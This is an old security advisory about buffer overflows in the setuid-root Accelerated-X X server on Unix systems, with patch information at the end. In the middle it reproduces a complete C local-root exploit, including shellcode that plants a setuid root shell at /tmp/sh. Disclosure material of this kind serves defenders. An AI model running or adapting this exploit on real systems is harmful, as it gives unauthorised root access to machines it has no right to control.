COMMAND

    Accelerated-X

SYSTEMS AFFECTED

    Unices (Linux, FreeBSD, Solaris/x86, SCO)

PROBLEM

    Following is based on KSR[T] Advisory #011.  Local users can gain
    administrative privileges by exploiting multiple buffer overflows
    (stack overwrites) in the Accelerated-X X server.

    Accelerated-X  Server  is  a  commercial  X  server available from
    http://www.xig.com/.  By default, the X server is installed setuid
    root so that when it is executed by a user it still retains enough
    privilege  to  load  drivers,  manipulate  the  display,  and  log
    information.   However,  due  to  insufficient  bounds checking on
    command-line parameters, an attacker can overflow the X server  by
    specifying a  48 byte  display string,  or through  a long  string
    passed into the -query command  line parameter.  Local users  that
    can execute the Accelerated-X Xserver can obtain root  privileges.
    (KSR[T]  would  like  to  thank  Chris  Evans for pointing out the
    -query  buffer  overflow  as  well  as  additional  security holes
    relating to command line parameters)

    Here is the exploit for the Accelerate-X buffer overflow.   c0nd0r
    checked  the  '-query'  argument  and  found  out that it will not
    overwrite the return address  thus not allowing the  exploitation.
    The argument '-indirect' behaves in the same way.

    /*
     * SDI linux exploit for Accelerate-X
     * Sekure SDI - Brazilian Information Security Team
     * by c0nd0r <condor@sekure.org>
     *
     * This script will exploit a vulnerability found by KSRT team
     * in the Accelerate-X Xserver [<=5.0].
     *
     * --------------------------------------------------------------------
     * The vulnerable buffer was small so we've changed the usual order to:
     * [garbage][eip][lots nop][shellcode]
     * BTW, I've also changed the code to execute, it will create a setuid
     * shell owned by the superuser at /tmp/sh.
     * --------------------------------------------------------------------
     *
     * Warning: DO NOT USE THIS TOOL FOR ILICIT ACTIVITIES! We take no
     *          responsability.
     *
     * Greets to jamez, bishop, bahamas, stderr, dumped, paranoia,
     *           marty (NORDO!), vader, fcon, slide, c_orb and
     *           specially to my sasazita. Also toxyn.org, pulhas.org,
     *           superbofh.org (Phibernet rox) and el8.org.
     *
     * Laughs - lame guys who hacked the senado/planalto.gov.br
     * pay some attention to the site: securityfocus.com (good point).
     * see you at #uground (irc.brasnet.org)
     */

    #include <stdio.h>

    /* generic shellcode */
    char shellcode[] =
	    "\xeb\x31\x5e\x89\x76\x32\x8d\x5e\x08\x89\x5e\x36"
	    "\x8d\x5e\x0b\x89\x5e\x3a\x31\xc0\x88\x46\x07\x88"
	    "\x46\x0a\x88\x46\x31\x89\x46\x3e\xb0\x0b\x89\xf3"
	    "\x8d\x4e\x32\x8d\x56\x3e\xcd\x80\x31\xdb\x89\xd8"
	    "\x40\xcd\x80\xe8\xca\xff\xff\xff"
	    "/bin/sh -c cp /bin/sh /tmp/sh; chmod 6755 /tmp/sh";

    main ( int argc, char *argv[] ) {
     char buf[1024];
     int x, y, offset=1000;
     long addr;
     int joe;

     if (argc > 1)
       offset = atoi ( argv[1]);

     /* return address */
     addr = (long) &joe + offset;

     buf[0] = ':';
     for ( x = 1; x < 53; x++)
      buf[x] = 'X';

     buf[x++] = (addr & 0x000000ff);
     buf[x++] = (addr & 0x0000ff00) >> 8;
     buf[x++] = (addr & 0x00ff0000) >> 16;
     buf[x++] = (addr & 0xff000000) >> 24;

     for (  ; x < 500; x++)
      buf[x] = 0x90;

     for ( y = 0; y < strlen(shellcode); y++, x++)
      buf[x] = shellcode[y];

     fprintf (stderr, "\nSDI Xaccel - Offset: %d | Addr: 0x%x\n\n",
	      offset, addr);

     buf[strlen(buf)] = '\0';

     execl ( "/usr/X11R6/bin/Xaccel", "Xaccel", buf, (char *)0);

    // setenv ( "EGG", buf, 1);
    // system ( "/bin/sh");

    }

SOLUTION

    For AccelX 5.x: XiG  has made  a patch  available for 5.0.1  which
		    corrects these  and other  potential command  line
		    interface  security  holes.   Users  running 5.0.0
		    have to  apply the  5.0.1 patch  prior to applying
		    the 5.0.2 patch.  The patch is available at

		    ftp://ftp.xig.com/pub/updates.

    For AccelX 4.x: Patch will be made available shortly.  An  interim
		    solution  is  to  use  an  X server wrapper, or to
		    limit access  to the  Xaccel binary  via a special
		    group.

    The upcoming  release of  Maximum CDE  2.1 comes  with the 5.0.2 X
    Server, and is not vulnerable to these attacks.